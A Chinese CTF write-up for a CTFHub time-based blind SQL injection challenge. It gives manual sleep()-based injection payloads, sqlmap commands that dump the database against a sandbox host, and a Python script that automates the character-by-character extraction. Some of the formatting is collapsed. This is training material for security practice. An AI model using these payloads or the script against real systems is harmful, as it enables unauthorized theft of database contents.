CTFHub-web(sql时间盲注)


文章目录

    • 手工注入
    • sqlmap注入
    • 使用脚本
    • 总结

手工注入 1. 题目信息
CTFHub-web(sql时间盲注)
文章图片

2. 页面3秒钟后才响应,说明数据库名称长度=4
1 and if(length(database())=4,sleep(3),1)

CTFHub-web(sql时间盲注)
文章图片

3. 猜解数据库名称
1 and if(ascii(substr(database(),1,1))>110,sleep(3),1) 1 and if(ascii(substr(database(),1,1))=115,sleep(3),1) ascii(s)=1151 and if(ascii(substr(database(),2,1))>110,sleep(3),1) 1 and if(ascii(substr(database(),2,1))=113,sleep(3),1) ascii(q)=1131 and if(ascii(substr(database(),3,1))>110,sleep(3),1) 1 and if(ascii(substr(database(),3,1))=108,sleep(3),1) ascii(l)=1081 and if(ascii(substr(database(),4,1))>110,sleep(3),1) 1 and if(ascii(substr(database(),4,1))=105,sleep(3),1) ascii(i)=105...... 不断调整ASCII码的范围逐渐得到数据库名称为sqli

【CTFHub-web(sql时间盲注)】CTFHub-web(sql时间盲注)
文章图片

CTFHub-web(sql时间盲注)
文章图片

4. sqli数据库中表的数量
1 and if((select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(3),1)

页面3秒后响应,说明有两张表
CTFHub-web(sql时间盲注)
文章图片

5. 猜解表名
1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=110,sleep(3),1) ascii(n)=1103秒后响应,说明第一张表的第一个字母为n 依次得到表名为news

1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=102,sleep(3),1) ascii(f)=1023秒后响应,说明第一张表的第一个字母为f 依次得到表名为flag

6. 猜解flag表的字段数
1 and if((select count(column_name) from information_schema.columns where table_name='flag')=1,sleep(3),1)

3秒后响应,只有一个字段
CTFHub-web(sql时间盲注)
文章图片

7. 猜解字段名
1 and if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),1,1))=102,sleep(3),1)一样的套路,得到字段名为flag

8. 猜解flag具体值
庞大的工作量太过耗时,所以到此为止,开始sqlmap注入
sqlmap注入 我是在Kali Linux下执行的
Windows如何安装使用SQLMap见:
https://blog.csdn.net/weixin_45254208/article/details/104697014
1. 数据库名称
Kali:
sqlmap -u "http://challenge-3c2ee474fb29b646.sandbox. ctfhub.com:10080/?id=1" --dbs

Windows:
python sqlmap.py -u "http://challenge-3c2ee474fb29b646.sandbox. ctfhub.com:10080/?id=1" --dbs

注意二者区别,后面以Kali为例,不再赘述
CTFHub-web(sql时间盲注)
文章图片

2. 数据表名称
sqlmap -u "http://challenge-3c2ee474fb29b646.sandbox. ctfhub.com:10080/?id=1" -D sqli --tables

CTFHub-web(sql时间盲注)
文章图片

3. 字段名,flag
sqlmap -u "http://challenge-3c2ee474fb29b646.sandbox. ctfhub.com:10080/?id=1" -D sqli -T flag --columns --dump

CTFHub-web(sql时间盲注)
文章图片

CTFHub-web(sql时间盲注)
文章图片

这里环境时间到了,最后一小部分flag没显示出来
使用脚本
#! /usr/bin/env python # _*_coding:utf-8 _*_ import requests import sys import timesession=requests.session() url = "http://challenge-e53e5a329b0199fa.sandbox.ctfhub.com:10080/?id=" name = ""for k in range(1,10): for i in range(1,10): print(i) for j in range(31,128): j = (128+31) -j str_ascii=chr(j) #数据库名 payolad = "if(substr(database(),%s,1) = '%s',sleep(1),1)"%(str(i),str(str_ascii)) #表名 #payolad = "if(substr((select table_name from information_schema.tables where table_schema='sqli' limit %d,1),%d,1) = '%s',sleep(1),1)" %(k,i,str(str_ascii)) #字段名 #payolad = "if(substr((select column_name from information_schema.columns where table_name='flag' and table_schema='sqli'),%d,1) = '%s',sleep(1),1)" %(i,str(str_ascii)) start_time=time.time() str_get = session.get(url=url + payolad) end_time = time.time() t = end_time - start_time if t > 1: if str_ascii == "+": sys.exit() else: name+=str_ascii break print(name)#查询字段内容 for i in range(1,50): print(i) for j in range(31,128): j = (128+31) -j str_ascii=chr(j) payolad = "if(substr((select flag from sqli.flag),%d,1) = '%s',sleep(1),1)" %(i,str_ascii) start_time = time.time() str_get = session.get(url=url + payolad) end_time = time.time() t = end_time - start_time if t > 1: if str_ascii == "+": sys.exit() else: name += str_ascii break print(name)

总结 和布尔盲注思路类似,使用sqlmap很关键

    推荐阅读